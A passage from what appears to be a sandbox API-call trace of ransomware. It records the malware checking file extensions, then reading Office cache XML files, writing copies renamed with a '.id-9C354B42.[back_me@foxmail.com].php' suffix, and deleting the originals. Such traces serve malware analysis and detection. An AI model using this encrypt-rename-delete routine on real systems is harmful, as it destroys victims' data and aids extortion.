lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString=".docx") returned 5 [0037.295] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.295] lstrlenW (lpString=".pdf") returned 4 [0037.295] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString=".xls") returned 4 [0037.295] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString=".xlsx") returned 5 [0037.295] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.295] lstrlenW (lpString=".ppt") returned 4 [0037.295] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.295] lstrlenW (lpString=".zip") returned 4 [0037.295] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.295] lstrlenW (lpString=".rar") returned 4 [0037.295] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.295] lstrlenW (lpString=".bz2") returned 4 [0037.296] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.296] lstrlenW (lpString=".7z") returned 3 [0037.296] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.296] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.296] lstrlenW (lpString=".dbf") returned 4 [0037.296] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.296] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.296] lstrlenW (lpString=".1cd") returned 4 [0037.296] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.296] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.296] lstrlenW (lpString=".jpg") returned 4 [0037.296] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.296] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.296] lstrlenW (lpString="ProPlusrWW.xml") returned 14 [0037.296] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.297] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=16852) returned 1 [0037.297] CloseHandle (hObject=0x1c0) returned 1 [0037.297] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020 [0037.297] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.297] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.297] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.297] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.297] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0037.297] GetLastError () returned 0x0 [0037.297] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x41d4, lpOverlapped=0x0) returned 1 [0037.299] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0037.300] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.300] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.300] SetEndOfFile (hFile=0x1fc) returned 1 [0037.300] CloseHandle (hObject=0x1fc) returned 1 [0037.301] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.301] SetEndOfFile (hFile=0x1c0) returned 1 [0037.302] CloseHandle (hObject=0x1c0) returned 1 [0037.302] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.302] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0037.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.302] lstrlenW (lpString=".doc") returned 4 [0037.302] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.302] lstrlenW (lpString=".docx") returned 5 [0037.303] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.303] lstrlenW (lpString=".pdf") returned 4 [0037.303] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString=".xls") returned 4 [0037.303] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString=".xlsx") returned 5 [0037.303] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.303] lstrlenW (lpString=".ppt") returned 4 [0037.303] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.303] lstrlenW (lpString=".zip") returned 4 [0037.303] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.303] lstrlenW (lpString=".rar") returned 4 [0037.303] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString=".bz2") returned 4 [0037.303] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString=".7z") returned 3 [0037.303] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.303] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.303] lstrlenW (lpString=".dbf") returned 4 [0037.303] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.303] lstrlenW (lpString=".1cd") returned 4 [0037.303] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.303] lstrlenW (lpString=".jpg") returned 4 [0037.303] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.303] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.303] lstrlenW (lpString=".doc") returned 4 [0037.303] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.303] lstrlenW (lpString=".docx") returned 5 [0037.303] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.303] lstrlenW (lpString=".pdf") returned 4 [0037.304] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString=".xls") returned 4 [0037.304] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString=".xlsx") returned 5 [0037.304] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.304] lstrlenW (lpString=".ppt") returned 4 [0037.304] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.304] lstrlenW (lpString=".zip") returned 4 [0037.304] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.304] lstrlenW (lpString=".rar") returned 4 [0037.304] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString=".bz2") returned 4 [0037.304] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString=".7z") returned 3 [0037.304] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.304] lstrlenW (lpString=".dbf") returned 4 [0037.304] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.304] lstrlenW (lpString=".1cd") returned 4 [0037.304] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.304] lstrlenW (lpString=".jpg") returned 4 [0037.304] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.304] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.304] lstrlenW (lpString="Setup.xml") returned 9 [0037.304] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.305] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=31094) returned 1 [0037.305] CloseHandle (hObject=0x1c0) returned 1 [0037.305] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0037.305] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.305] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.305] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.305] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.305] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0037.305] GetLastError () returned 0x0 [0037.305] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x7976, lpOverlapped=0x0) returned 1 [0037.307] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x7980, lpOverlapped=0x0) returned 1 [0037.309] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.309] WriteFile (in: hFile=0x1fc, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.309] SetEndOfFile (hFile=0x1fc) returned 1 [0037.309] CloseHandle (hObject=0x1fc) returned 1 [0037.310] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.310] SetEndOfFile (hFile=0x1c0) returned 1 [0037.313] CloseHandle (hObject=0x1c0) returned 1 [0037.313] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.313] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.313] lstrlenW (lpString=".doc") returned 4 [0037.313] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.313] lstrlenW (lpString=".docx") returned 5 [0037.313] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.313] lstrlenW (lpString=".pdf") returned 4 [0037.313] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.313] lstrlenW (lpString=".xls") returned 4 [0037.313] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString=".xlsx") returned 5 [0037.314] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.314] lstrlenW (lpString=".ppt") returned 4 [0037.314] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.314] lstrlenW (lpString=".zip") returned 4 [0037.314] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.314] lstrlenW (lpString=".rar") returned 4 [0037.314] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString=".bz2") returned 4 [0037.314] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString=".7z") returned 3 [0037.314] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.314] lstrlenW (lpString=".dbf") returned 4 [0037.314] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.314] lstrlenW (lpString=".1cd") returned 4 [0037.314] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.314] lstrlenW (lpString=".jpg") returned 4 [0037.314] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.314] lstrlenW (lpString=".doc") returned 4 [0037.314] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString=".docx") returned 5 [0037.314] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.314] lstrlenW (lpString=".pdf") returned 4 [0037.314] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString=".xls") returned 4 [0037.314] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.314] lstrlenW (lpString=".xlsx") returned 5 [0037.315] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.315] lstrlenW (lpString=".ppt") returned 4 [0037.315] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.315] lstrlenW (lpString=".zip") returned 4 [0037.315] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.315] lstrlenW (lpString=".rar") returned 4 [0037.315] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.315] lstrlenW (lpString=".bz2") returned 4 [0037.315] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.315] lstrlenW (lpString=".7z") returned 3 [0037.315] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.315] lstrlenW (lpString=".dbf") returned 4 [0037.315] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.315] lstrlenW (lpString=".1cd") returned 4 [0037.315] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.315] lstrlenW (lpString=".jpg") returned 4 [0037.315] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.315] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.315] lstrlenW (lpString="Office32WW.xml") returned 14 [0037.315] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.316] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=4274) returned 1 [0037.316] CloseHandle (hObject=0x1c0) returned 1 [0037.316] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0037.316] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.316] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0037.316] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.316] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.317] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.467] GetLastError () returned 0x0 [0037.467] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0037.634] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0037.635] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.635] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.635] SetEndOfFile (hFile=0x1e4) returned 1 [0037.635] CloseHandle (hObject=0x1e4) returned 1 [0037.636] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.636] SetEndOfFile (hFile=0x1c0) returned 1 [0037.636] CloseHandle (hObject=0x1c0) returned 1 [0037.636] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.637] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0037.637] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.637] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.637] lstrlenW (lpString=".doc") returned 4 [0037.637] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.637] lstrlenW (lpString=".docx") returned 5 [0037.637] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.637] lstrlenW (lpString=".pdf") returned 4 [0037.637] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.637] lstrlenW (lpString=".xls") returned 4 [0037.637] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.637] lstrlenW (lpString=".xlsx") returned 5 [0037.637] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.637] lstrlenW (lpString=".ppt") returned 4 [0037.637] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.637] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.637] lstrlenW (lpString=".zip") returned 4 [0037.637] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.637] lstrlenW (lpString=".rar") returned 4 [0037.637] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.637] lstrlenW (lpString=".bz2") returned 4 [0037.637] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.637] lstrlenW (lpString=".7z") returned 3 [0037.637] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString=".dbf") returned 4 [0037.638] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString=".1cd") returned 4 [0037.638] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.638] lstrlenW (lpString=".jpg") returned 4 [0037.638] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.638] lstrlenW (lpString="C:\\MSOCache\\All 